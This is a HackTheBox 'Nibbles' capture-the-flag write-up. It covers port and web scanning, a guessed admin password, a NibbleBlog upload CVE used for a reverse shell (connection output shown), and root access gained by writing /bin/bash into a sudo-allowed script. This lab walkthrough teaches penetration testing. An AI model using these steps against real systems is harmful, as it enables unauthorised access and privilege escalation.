[HackTheBox] Nibbles

This box requires very basic pentesting skills to exploit. Starts with rce and ends with sudo.

Summary

  • Check source code of the main page.
  • Guess admin’s password on admin.php page.
  • Use CVE-2015-6967 to get a reverse shell.
  • sudo -l

Recon

Port Scan

nmap -p- -sV -T4 10.10.10.75

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Exploitation

NibbleBlog

Checking source code reveals a comment with a directory of the NibbleBlog.

<!-- /nibbleblog/ directory. Nothing interesting here! -->

Scanning the blog with nikto reveal an admin login page. nikto -h http://10.10.10.75/nibbleblog/

+ OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3268: /nibbleblog/admin/: Directory indexing found.
+ OSVDB-3092: /nibbleblog/admin.php: This might be interesting...
+ OSVDB-3092: /nibbleblog/admin/: This might be interesting...

Running hydra or sqlmap on the page blocks you so we need to guess the password. After a bit of trial and error, I found that nibbles works as a password for admin account.

Now we can use CVE-2015-6967 to get a reverse shell. The link to the exploit can be found HERE.

connect to [10.10.14.19] from (UNKNOWN) [10.10.10.75] 47436
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 09:54:01 up  1:08,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ 

Privilege Escalation

Running sudo -l reveal that we can execute /home/nibbler/personal/stuff/monitor.sh as root.

sudo -l

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

The file does not exist, but we have write permissions to the directory so we can create it.

echo "/bin/bash" > /home/nibbler/personal/stuff/monitor.sh

And running it gives us root shell.

sudo /home/nibbler/personal/stuff/monitor.sh